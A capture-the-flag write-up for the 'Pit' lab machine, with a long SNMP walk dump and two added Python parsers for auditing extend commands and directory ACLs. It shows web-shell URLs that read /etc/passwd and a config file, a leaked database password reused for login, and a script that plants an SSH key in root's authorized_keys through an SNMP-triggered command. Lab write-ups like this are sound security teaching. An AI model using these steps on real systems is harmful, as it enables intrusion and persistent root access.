.1.3.6.1.2.1.25.4.2.1.2.551 = STRING: "scsi_eh_12"
.1.3.6.1.2.1.25.4.2.1.2.552 = STRING: "scsi_tmf_12"
.1.3.6.1.2.1.25.4.2.1.2.553 = STRING: "scsi_eh_13"
.1.3.6.1.2.1.25.4.2.1.2.554 = STRING: "scsi_tmf_13"
.1.3.6.1.2.1.25.4.2.1.2.555 = STRING: "scsi_eh_14"
.1.3.6.1.2.1.25.4.2.1.2.556 = STRING: "scsi_tmf_14"
.1.3.6.1.2.1.25.4.2.1.2.557 = STRING: "scsi_eh_15"
.1.3.6.1.2.1.25.4.2.1.2.558 = STRING: "scsi_tmf_15"
.1.3.6.1.2.1.25.4.2.1.2.559 = STRING: "irq/16-vmwgfx"
.1.3.6.1.2.1.25.4.2.1.2.560 = STRING: "scsi_eh_16"
.1.3.6.1.2.1.25.4.2.1.2.561 = STRING: "scsi_tmf_16"
.1.3.6.1.2.1.25.4.2.1.2.562 = STRING: "ttm_swap"
.1.3.6.1.2.1.25.4.2.1.2.563 = STRING: "scsi_eh_17"
.1.3.6.1.2.1.25.4.2.1.2.564 = STRING: "scsi_tmf_17"
.1.3.6.1.2.1.25.4.2.1.2.565 = STRING: "scsi_eh_18"
.1.3.6.1.2.1.25.4.2.1.2.566 = STRING: "scsi_tmf_18"
.1.3.6.1.2.1.25.4.2.1.2.567 = STRING: "scsi_eh_19"
.1.3.6.1.2.1.25.4.2.1.2.568 = STRING: "scsi_tmf_19"
.1.3.6.1.2.1.25.4.2.1.2.569 = STRING: "scsi_eh_20"
.1.3.6.1.2.1.25.4.2.1.2.570 = STRING: "scsi_tmf_20"
.1.3.6.1.2.1.25.4.2.1.2.571 = STRING: "scsi_eh_21"
.1.3.6.1.2.1.25.4.2.1.2.572 = STRING: "scsi_tmf_21"
.1.3.6.1.2.1.25.4.2.1.2.573 = STRING: "scsi_eh_22"
.1.3.6.1.2.1.25.4.2.1.2.574 = STRING: "scsi_tmf_22"
.1.3.6.1.2.1.25.4.2.1.2.575 = STRING: "scsi_eh_23"
.1.3.6.1.2.1.25.4.2.1.2.576 = STRING: "scsi_tmf_23"
.1.3.6.1.2.1.25.4.2.1.2.577 = STRING: "scsi_eh_24"
.1.3.6.1.2.1.25.4.2.1.2.578 = STRING: "scsi_tmf_24"
.1.3.6.1.2.1.25.4.2.1.2.579 = STRING: "scsi_eh_25"
.1.3.6.1.2.1.25.4.2.1.2.580 = STRING: "scsi_tmf_25"
.1.3.6.1.2.1.25.4.2.1.2.581 = STRING: "scsi_eh_26"
.1.3.6.1.2.1.25.4.2.1.2.582 = STRING: "scsi_tmf_26"
.1.3.6.1.2.1.25.4.2.1.2.583 = STRING: "scsi_eh_27"
.1.3.6.1.2.1.25.4.2.1.2.584 = STRING: "scsi_tmf_27"
.1.3.6.1.2.1.25.4.2.1.2.585 = STRING: "scsi_eh_28"
.1.3.6.1.2.1.25.4.2.1.2.586 = STRING: "scsi_tmf_28"
.1.3.6.1.2.1.25.4.2.1.2.587 = STRING: "scsi_eh_29"
.1.3.6.1.2.1.25.4.2.1.2.588 = STRING: "scsi_tmf_29"
.1.3.6.1.2.1.25.4.2.1.2.589 = STRING: "scsi_eh_30"
.1.3.6.1.2.1.25.4.2.1.2.590 = STRING: "scsi_tmf_30"
.1.3.6.1.2.1.25.4.2.1.2.628 = STRING: "kworker/1:1H-kblockd"
.1.3.6.1.2.1.25.4.2.1.2.643 = STRING: "scsi_eh_31"
.1.3.6.1.2.1.25.4.2.1.2.645 = STRING: "scsi_tmf_31"
.1.3.6.1.2.1.25.4.2.1.2.647 = STRING: "scsi_eh_32"
.1.3.6.1.2.1.25.4.2.1.2.648 = STRING: "scsi_tmf_32"
.1.3.6.1.2.1.25.4.2.1.2.685 = STRING: "kdmflush"
.1.3.6.1.2.1.25.4.2.1.2.694 = STRING: "kdmflush"
.1.3.6.1.2.1.25.4.2.1.2.719 = STRING: "xfsalloc"
.1.3.6.1.2.1.25.4.2.1.2.720 = STRING: "xfs_mru_cache"
.1.3.6.1.2.1.25.4.2.1.2.727 = STRING: "xfs-buf/dm-0"
.1.3.6.1.2.1.25.4.2.1.2.732 = STRING: "xfs-conv/dm-0"
.1.3.6.1.2.1.25.4.2.1.2.733 = STRING: "xfs-cil/dm-0"
.1.3.6.1.2.1.25.4.2.1.2.734 = STRING: "xfs-reclaim/dm-"
.1.3.6.1.2.1.25.4.2.1.2.735 = STRING: "xfs-eofblocks/d"
.1.3.6.1.2.1.25.4.2.1.2.736 = STRING: "xfs-log/dm-0"
.1.3.6.1.2.1.25.4.2.1.2.737 = STRING: "xfsaild/dm-0"
.1.3.6.1.2.1.25.4.2.1.2.738 = STRING: "kworker/0:1H-kblockd"
.1.3.6.1.2.1.25.4.2.1.2.834 = STRING: "systemd-journal"
.1.3.6.1.2.1.25.4.2.1.2.867 = STRING: "systemd-udevd"
.1.3.6.1.2.1.25.4.2.1.2.931 = STRING: "kdmflush"
.1.3.6.1.2.1.25.4.2.1.2.944 = STRING: "xfs-buf/dm-2"
.1.3.6.1.2.1.25.4.2.1.2.945 = STRING: "xfs-conv/dm-2"
.1.3.6.1.2.1.25.4.2.1.2.946 = STRING: "xfs-cil/dm-2"
.1.3.6.1.2.1.25.4.2.1.2.947 = STRING: "xfs-reclaim/dm-"
.1.3.6.1.2.1.25.4.2.1.2.948 = STRING: "xfs-eofblocks/d"
.1.3.6.1.2.1.25.4.2.1.2.949 = STRING: "xfs-log/dm-2"
.1.3.6.1.2.1.25.4.2.1.2.950 = STRING: "xfsaild/dm-2"
.1.3.6.1.2.1.25.4.2.1.2.960 = STRING: "jbd2/sda1-8"
.1.3.6.1.2.1.25.4.2.1.2.961 = STRING: "ext4-rsv-conver"
.1.3.6.1.2.1.25.4.2.1.2.986 = STRING: "auditd"
.1.3.6.1.2.1.25.4.2.1.2.988 = STRING: "sedispatch"
.1.3.6.1.2.1.25.4.2.1.2.1021 = STRING: "sssd"
.1.3.6.1.2.1.25.4.2.1.2.1022 = STRING: "VGAuthService"
.1.3.6.1.2.1.25.4.2.1.2.1023 = STRING: "vmtoolsd"
.1.3.6.1.2.1.25.4.2.1.2.1024 = STRING: "polkitd"
.1.3.6.1.2.1.25.4.2.1.2.1025 = STRING: "irqbalance"
.1.3.6.1.2.1.25.4.2.1.2.1029 = STRING: "dbus-daemon"
.1.3.6.1.2.1.25.4.2.1.2.1034 = STRING: "chronyd"
.1.3.6.1.2.1.25.4.2.1.2.1044 = STRING: "rngd"
.1.3.6.1.2.1.25.4.2.1.2.1055 = STRING: "sssd_be"
.1.3.6.1.2.1.25.4.2.1.2.1068 = STRING: "sssd_nss"
.1.3.6.1.2.1.25.4.2.1.2.1076 = STRING: "firewalld"
.1.3.6.1.2.1.25.4.2.1.2.1100 = STRING: "systemd-logind"
.1.3.6.1.2.1.25.4.2.1.2.1101 = STRING: "NetworkManager"
.1.3.6.1.2.1.25.4.2.1.2.1115 = STRING: "tuned"
.1.3.6.1.2.1.25.4.2.1.2.1118 = STRING: "sshd"
.1.3.6.1.2.1.25.4.2.1.2.1139 = STRING: "crond"
.1.3.6.1.2.1.25.4.2.1.2.1180 = STRING: "agetty"
.1.3.6.1.2.1.25.4.2.1.2.1188 = STRING: "nginx"
.1.3.6.1.2.1.25.4.2.1.2.1189 = STRING: "nginx"
.1.3.6.1.2.1.25.4.2.1.2.1190 = STRING: "nginx"
.1.3.6.1.2.1.25.4.2.1.2.1233 = STRING: "mysqld"
.1.3.6.1.2.1.25.4.2.1.2.1467 = STRING: "snmpd"
.1.3.6.1.2.1.25.4.2.1.2.1469 = STRING: "rsyslogd"
.1.3.6.1.2.1.25.4.2.1.2.24958 = STRING: "kworker/0:2-cgroup_pidlist_destroy"
.1.3.6.1.2.1.25.4.2.1.2.25154 = STRING: "kworker/u4:2-events_unbound"
.1.3.6.1.2.1.25.4.2.1.2.25157 = STRING: "kworker/1:3-memcg_kmem_cache"
.1.3.6.1.2.1.25.4.2.1.2.25160 = STRING: "kworker/1:4-cgroup_destroy"
.1.3.6.1.2.1.25.4.2.1.2.25174 = STRING: "anacron"
.1.3.6.1.2.1.25.4.2.1.2.25185 = STRING: "kworker/0:3-mm_percpu_wq"
.1.3.6.1.2.1.25.4.2.1.2.25214 = STRING: "kworker/0:5-events"
.1.3.6.1.2.1.25.4.2.1.2.25255 = STRING: "kworker/1:0-events_power_efficient"
.1.3.6.1.2.1.25.4.2.1.2.25296 = STRING: "kworker/u4:1-flush-253:0"
.1.3.6.1.2.1.25.4.2.1.2.25304 = STRING: "kworker/0:0-events"
.1.3.6.1.2.1.25.4.2.1.2.25318 = STRING: "kworker/1:1-cgroup_pidlist_destroy"
.1.3.6.1.2.1.25.4.2.1.2.25331 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25332 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25333 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25334 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25335 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25336 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25347 = STRING: "php-fpm"
.1.3.6.1.2.1.25.4.2.1.2.25361 = STRING: "php-fpm"
[...]
.1.3.6.1.2.1.25.4.2.1.4.986 = STRING: "/sbin/auditd"
.1.3.6.1.2.1.25.4.2.1.4.988 = STRING: "/usr/sbin/sedispatch"
.1.3.6.1.2.1.25.4.2.1.4.1021 = STRING: "/usr/sbin/sssd"
.1.3.6.1.2.1.25.4.2.1.4.1022 = STRING: "/usr/bin/VGAuthService"
.1.3.6.1.2.1.25.4.2.1.4.1023 = STRING: "/usr/bin/vmtoolsd"
.1.3.6.1.2.1.25.4.2.1.4.1024 = STRING: "/usr/lib/polkit-1/polkitd"
.1.3.6.1.2.1.25.4.2.1.4.1025 = STRING: "/usr/sbin/irqbalance"
.1.3.6.1.2.1.25.4.2.1.4.1029 = STRING: "/usr/bin/dbus-daemon"
.1.3.6.1.2.1.25.4.2.1.4.1034 = STRING: "/usr/sbin/chronyd"
.1.3.6.1.2.1.25.4.2.1.4.1044 = STRING: "/sbin/rngd"
.1.3.6.1.2.1.25.4.2.1.4.1055 = STRING: "/usr/libexec/sssd/sssd_be"
.1.3.6.1.2.1.25.4.2.1.4.1068 = STRING: "/usr/libexec/sssd/sssd_nss"
.1.3.6.1.2.1.25.4.2.1.4.1076 = STRING: "/usr/libexec/platform-python"
.1.3.6.1.2.1.25.4.2.1.4.1100 = STRING: "/usr/lib/systemd/systemd-logind"
.1.3.6.1.2.1.25.4.2.1.4.1101 = STRING: "/usr/sbin/NetworkManager"
.1.3.6.1.2.1.25.4.2.1.4.1115 = STRING: "/usr/libexec/platform-python"
.1.3.6.1.2.1.25.4.2.1.4.1118 = STRING: "/usr/sbin/sshd"
.1.3.6.1.2.1.25.4.2.1.4.1139 = STRING: "/usr/sbin/crond"
.1.3.6.1.2.1.25.4.2.1.4.1180 = STRING: "/sbin/agetty"
.1.3.6.1.2.1.25.4.2.1.4.1188 = STRING: "nginx: master process /usr/sbin/nginx"
.1.3.6.1.2.1.25.4.2.1.4.1189 = STRING: "nginx: worker process"
.1.3.6.1.2.1.25.4.2.1.4.1190 = STRING: "nginx: worker process"
.1.3.6.1.2.1.25.4.2.1.4.1233 = STRING: "/usr/libexec/mysqld"
.1.3.6.1.2.1.25.4.2.1.4.1467 = STRING: "/usr/sbin/snmpd"
.1.3.6.1.2.1.25.4.2.1.4.1469 = STRING: "/usr/sbin/rsyslogd"
.1.3.6.1.2.1.25.4.2.1.4.24958 = ""
.1.3.6.1.2.1.25.4.2.1.4.25154 = ""
.1.3.6.1.2.1.25.4.2.1.4.25157 = ""
.1.3.6.1.2.1.25.4.2.1.4.25160 = ""
.1.3.6.1.2.1.25.4.2.1.4.25174 = STRING: "/usr/sbin/anacron"
[...]
.1.3.6.1.2.1.25.4.2.1.5.988 = ""
.1.3.6.1.2.1.25.4.2.1.5.1021 = STRING: "-i --logger=files"
.1.3.6.1.2.1.25.4.2.1.5.1022 = STRING: "-s"
.1.3.6.1.2.1.25.4.2.1.5.1023 = ""
.1.3.6.1.2.1.25.4.2.1.5.1024 = STRING: "--no-debug"
.1.3.6.1.2.1.25.4.2.1.5.1025 = STRING: "--foreground"
.1.3.6.1.2.1.25.4.2.1.5.1029 = STRING: "--system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only"
.1.3.6.1.2.1.25.4.2.1.5.1034 = ""
.1.3.6.1.2.1.25.4.2.1.5.1044 = STRING: "-f --fill-watermark=0"
.1.3.6.1.2.1.25.4.2.1.5.1055 = STRING: "--domain implicit_files --uid 0 --gid 0 --logger=files"
.1.3.6.1.2.1.25.4.2.1.5.1068 = STRING: "--uid 0 --gid 0 --logger=files"
.1.3.6.1.2.1.25.4.2.1.5.1076 = STRING: "-s /usr/sbin/firewalld --nofork --nopid"
.1.3.6.1.2.1.25.4.2.1.5.1100 = ""
.1.3.6.1.2.1.25.4.2.1.5.1101 = STRING: "--no-daemon"
.1.3.6.1.2.1.25.4.2.1.5.1115 = STRING: "-Es /usr/sbin/tuned -l -P"
.1.3.6.1.2.1.25.4.2.1.5.1118 = STRING: "-D -oCiphers=aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128"
.1.3.6.1.2.1.25.4.2.1.5.1139 = STRING: "-n"
.1.3.6.1.2.1.25.4.2.1.5.1180 = STRING: "-o -p -- \\u --noclear tty1 linux"
.1.3.6.1.2.1.25.4.2.1.5.1188 = ""
.1.3.6.1.2.1.25.4.2.1.5.1189 = ""
.1.3.6.1.2.1.25.4.2.1.5.1190 = ""
.1.3.6.1.2.1.25.4.2.1.5.1233 = STRING: "--basedir=/usr"
.1.3.6.1.2.1.25.4.2.1.5.1467 = STRING: "-LS0-6d -f"
.1.3.6.1.2.1.25.4.2.1.5.1469 = STRING: "-n"
.1.3.6.1.2.1.25.4.2.1.5.24958 = ""
.1.3.6.1.2.1.25.4.2.1.5.25154 = ""
.1.3.6.1.2.1.25.4.2.1.5.25157 = ""
.1.3.6.1.2.1.25.4.2.1.5.25160 = ""
.1.3.6.1.2.1.25.4.2.1.5.25174 = STRING: "-s"
.1.3.6.1.2.1.25.4.2.1.5.25185 = ""
[...]
.1.3.6.1.4.1.8072.1.3.2.2.1.2.10.109.111.110.105.116.111.114.105.110.103 = STRING: /usr/bin/monitor
.1.3.6.1.4.1.8072.1.3.2.2.1.3.10.109.111.110.105.116.111.114.105.110.103 = STRING:
.1.3.6.1.4.1.8072.1.3.2.2.1.4.10.109.111.110.105.116.111.114.105.110.103 = STRING:
.1.3.6.1.4.1.8072.1.3.2.2.1.5.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: 5
.1.3.6.1.4.1.8072.1.3.2.2.1.6.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: exec(1)
.1.3.6.1.4.1.8072.1.3.2.2.1.7.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: run-on-read(1)
.1.3.6.1.4.1.8072.1.3.2.2.1.20.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: permanent(4)
.1.3.6.1.4.1.8072.1.3.2.2.1.21.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: active(1)
.1.3.6.1.4.1.8072.1.3.2.3.1.1.10.109.111.110.105.116.111.114.105.110.103 = STRING: Memory usage
.1.3.6.1.4.1.8072.1.3.2.3.1.2.10.109.111.110.105.116.111.114.105.110.103 = STRING: Memory usage
total used free shared buff/cache available
Mem: 3.8Gi 451Mi 3.0Gi 32Mi 356Mi 3.1Gi
Swap: 1.9Gi 0B 1.9Gi
Database status
OK - Connection to database successful.
System release info
CentOS Linux release 8.3.2011
SELinux Settings
user
Labeling MLS/ MLS/
SELinux User Prefix MCS Level MCS Range SELinux Roles
guest_u user s0 s0 guest_r
root user s0 s0-s0:c0.c1023 staff_r sysadm_r system_r unconfined_r
staff_u user s0 s0-s0:c0.c1023 staff_r sysadm_r unconfined_r
sysadm_u user s0 s0-s0:c0.c1023 sysadm_r
system_u user s0 s0-s0:c0.c1023 system_r unconfined_r
unconfined_u user s0 s0-s0:c0.c1023 system_r unconfined_r
user_u user s0 s0 user_r
xguest_u user s0 s0 xguest_r
login
Login Name SELinux User MLS/MCS Range Service
__default__ unconfined_u s0-s0:c0.c1023 *
michelle user_u s0 *
root unconfined_u s0-s0:c0.c1023 *
System uptime
03:24:53 up 1 day, 22:01, 0 users, load average: 0.14, 0.06, 0.01
.1.3.6.1.4.1.8072.1.3.2.3.1.3.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: 31
.1.3.6.1.4.1.8072.1.3.2.3.1.4.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: 0
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.1 = STRING: Memory usage
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.2 = STRING: total used free shared buff/cache available
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.3 = STRING: Mem: 3.8Gi 451Mi 3.0Gi 32Mi 356Mi 3.1Gi
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.4 = STRING: Swap: 1.9Gi 0B 1.9Gi
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.5 = STRING: Database status
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.6 = STRING: OK - Connection to database successful.
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.7 = STRING: System release info
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.8 = STRING: CentOS Linux release 8.3.2011
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.9 = STRING: SELinux Settings
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.10 = STRING: user
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.11 = STRING:
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.12 = STRING: Labeling MLS/ MLS/
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.13 = STRING: SELinux User Prefix MCS Level MCS Range SELinux Roles
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.14 = STRING:
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.15 = STRING: guest_u user s0 s0 guest_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.16 = STRING: root user s0 s0-s0:c0.c1023 staff_r sysadm_r system_r unconfined_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.17 = STRING: staff_u user s0 s0-s0:c0.c1023 staff_r sysadm_r unconfined_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.18 = STRING: sysadm_u user s0 s0-s0:c0.c1023 sysadm_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.19 = STRING: system_u user s0 s0-s0:c0.c1023 system_r unconfined_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.20 = STRING: unconfined_u user s0 s0-s0:c0.c1023 system_r unconfined_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.21 = STRING: user_u user s0 s0 user_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.22 = STRING: xguest_u user s0 s0 xguest_r
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.23 = STRING: login
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.24 = STRING:
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.25 = STRING: Login Name SELinux User MLS/MCS Range Service
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.26 = STRING:
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.27 = STRING: __default__ unconfined_u s0-s0:c0.c1023 *
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.28 = STRING: michelle user_u s0 *
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.29 = STRING: root unconfined_u s0-s0:c0.c1023 *
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.30 = STRING: System uptime
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.31 = STRING: 03:24:53 up 1 day, 22:01, 0 users, load average: 0.14, 0.06, 0.01
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.31 = No more variables left in this MIB View (It is past the end of the MIB tree)
From the output we get the user michelle.
We also get the path /var/www/html/seeddms51x/seeddms.
Port 9090
We add the host info to the hosts file and visit the page.
Searching for intext:"CentOS Linux" intext:" Reuse my password for remote connections" yields results which suggest that the installed software is called Cockpit.
Searchsploit shows that there is an unauthenticated CSRF vulnerability.
Foothold
With the identified exploit from searchsploit, we upload the php shell and then try to execute a command.
URI http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=cat%20/etc/passwd
We attempted different techniques to get a reverse shell, but without success.
If we enumerate the directories with ls and try http://dms-pit.htb/seeddms51x/data/1048576/32/1.php?cmd=ls%20../../conf
we see the following files:
settings.xml
settings.xml.template
stopwords.txt
We try http://dms-pit.htb/seeddms51x/data/1048576/33/1.php?cmd=cat ../../conf/settings.xml
which only gives a blank screen. However, viewing the page source shows that the browser doesn't render the content because it is XML.
If we try http://dms-pit.htb/seeddms51x/data/1048576/35/1.php?cmd=cat /var/www/html/seeddms51x/conf/settings.xml
we see
<database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
</database>
mysql:ied^ieY6xoquu
This password works with the username michelle on port 9090.
Cockpit has a Terminal option which gives us an interactive shell.
Privesc
From the snmpwalk output, we observe:
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
NET-SNMP-EXTEND-MIB::nsExtendArgs."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."monitoring" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."monitoring" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."monitoring" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."monitoring" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."monitoring" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."monitoring" = INTEGER: run-on-read(1) means that the command is executed each time the object is read.
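The numeric rows earlier in the walk and the named NET-SNMP-EXTEND-MIB rows above are the same table: the OID suffix 10.109.111.110.105.116.111.114.105.110.103 is the length-prefixed ASCII string "monitoring". The following added example (not part of the original writeup; the function names are hypothetical) decodes that index from a numeric walk and lists every active run-on-read command, which is the inventory to review when checking what snmpd will execute for anyone holding the community string.

```python
import re

# nsExtendConfigTable columns, matching the named rows shown in the walk output.
CONFIG_PREFIX = ".1.3.6.1.4.1.8072.1.3.2.2.1."
COLUMNS = {2: "nsExtendCommand", 3: "nsExtendArgs", 4: "nsExtendInput",
           5: "nsExtendCacheTime", 6: "nsExtendExecType", 7: "nsExtendRunType",
           20: "nsExtendStorage", 21: "nsExtendStatus"}

# Sample input: lines copied from the walk output shown on this page.
SAMPLE_WALK = """\
.1.3.6.1.2.1.25.4.2.1.5.1233 = STRING: "--basedir=/usr"
.1.3.6.1.4.1.8072.1.3.2.2.1.2.10.109.111.110.105.116.111.114.105.110.103 = STRING: /usr/bin/monitor
.1.3.6.1.4.1.8072.1.3.2.2.1.3.10.109.111.110.105.116.111.114.105.110.103 = STRING:
.1.3.6.1.4.1.8072.1.3.2.2.1.6.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: exec(1)
.1.3.6.1.4.1.8072.1.3.2.2.1.7.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: run-on-read(1)
.1.3.6.1.4.1.8072.1.3.2.2.1.21.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: active(1)
"""

def decode_index(parts):
    """Decode a length-prefixed string index: [3, 97, 98, 99] -> 'abc'."""
    if not parts or parts[0] != len(parts) - 1:
        raise ValueError("index length prefix does not match")
    return "".join(chr(c) for c in parts[1:])

def parse_extends(walk_text):
    """Return {extend_name: {column_name: value}} for nsExtendConfigTable rows."""
    extends = {}
    for line in walk_text.splitlines():
        oid, sep, value = line.partition(" = ")
        if not sep or not oid.startswith(CONFIG_PREFIX):
            continue  # not an extend configuration row
        nums = [int(n) for n in oid[len(CONFIG_PREFIX):].split(".")]
        column = COLUMNS.get(nums[0])
        if column is None:
            continue
        name = decode_index(nums[1:])
        # Strip the type tag ("STRING:", "INTEGER:") that snmpwalk prints.
        value = re.sub(r"^[A-Za-z0-9-]+:\s*", "", value.strip())
        extends.setdefault(name, {})[column] = value
    return extends

def run_on_read_commands(extends):
    """Active extends whose command runs each time the output objects are read."""
    return {name: row.get("nsExtendCommand") for name, row in extends.items()
            if row.get("nsExtendRunType", "").startswith("run-on-read")
            and row.get("nsExtendStatus", "").startswith("active")}
```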
Looking at the script
[michelle@pit ~]$ file /usr/bin/monitor
/usr/bin/monitor: Bourne-Again shell script, ASCII text executable
[michelle@pit ~]$ cat /usr/bin/monitor
#!/bin/bash
for script in /usr/local/monitoring/check*sh
do
/bin/bash $script
done
[michelle@pit ~]$
We have write access to /usr/local/monitoring
[michelle@pit ~]$ getfacl /usr/local/monitoring/
getfacl: Removing leading '/' from absolute path names
# file: usr/local/monitoring/
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---
[michelle@pit ~]$
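As an added example (not from the original writeup; the function names are hypothetical), this parser reads a getfacl record, applies the ACL mask, and reports every principal other than the owning user who can create files in the directory. Run against the record above, it surfaces the michelle entry that lets that user drop a check*sh file for /usr/bin/monitor to execute.

```python
# Sample input: the getfacl record shown on this page (stderr notice omitted).
SAMPLE_GETFACL = """\
# file: usr/local/monitoring/
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---
"""

def parse_getfacl(text):
    """Parse one getfacl record into (metadata, [(tag, qualifier, perms)])."""
    meta, entries = {}, []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("# ") and ": " in line:
            key, _, val = line[2:].partition(": ")
            meta[key] = val
        elif line and not line.startswith(("#", "default:")):
            # Drop a trailing "#effective:..." comment that getfacl may append.
            tag, qualifier, perms = line.split("#")[0].split()[0].split(":")[:3]
            entries.append((tag, qualifier, perms))
    return meta, entries

def effective(perms, mask):
    """A permission bit is effective only if it is also set in the mask."""
    return "".join(p if p == m else "-" for p, m in zip(perms, mask))

def writers_besides_owner(text):
    """Return {principal: effective perms} for non-owner entries that can
    create files; that needs both w and x on the directory."""
    meta, entries = parse_getfacl(text)
    mask = next((p for t, _, p in entries if t == "mask"), "rwx")
    found = {}
    for tag, qualifier, perms in entries:
        if tag == "mask" or (tag == "user" and not qualifier):
            continue  # skip the mask itself and the owning user
        if tag in ("user", "group"):
            perms = effective(perms, mask)  # named users and groups are masked
        if "w" in perms and "x" in perms:
            if not qualifier and tag == "group":
                qualifier = meta.get("group", "?")  # owning group's name
            found[f"{tag}:{qualifier}"] = perms
    return found
```

A plain mode listing shows this directory only as root-owned with a trailing `+`, so the named-user entry is visible only when the ACL itself is inspected.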
So we create a script which will add our public key to root's SSH authorized_keys.
echo "ssh-rsa <public-key-data> bob@kali" > /root/.ssh/authorized_keys
To trigger monitor through run-on-read(1), we run snmpwalk with the following command line:
snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 nsExtendObjects
Subsequently we can ssh in as root.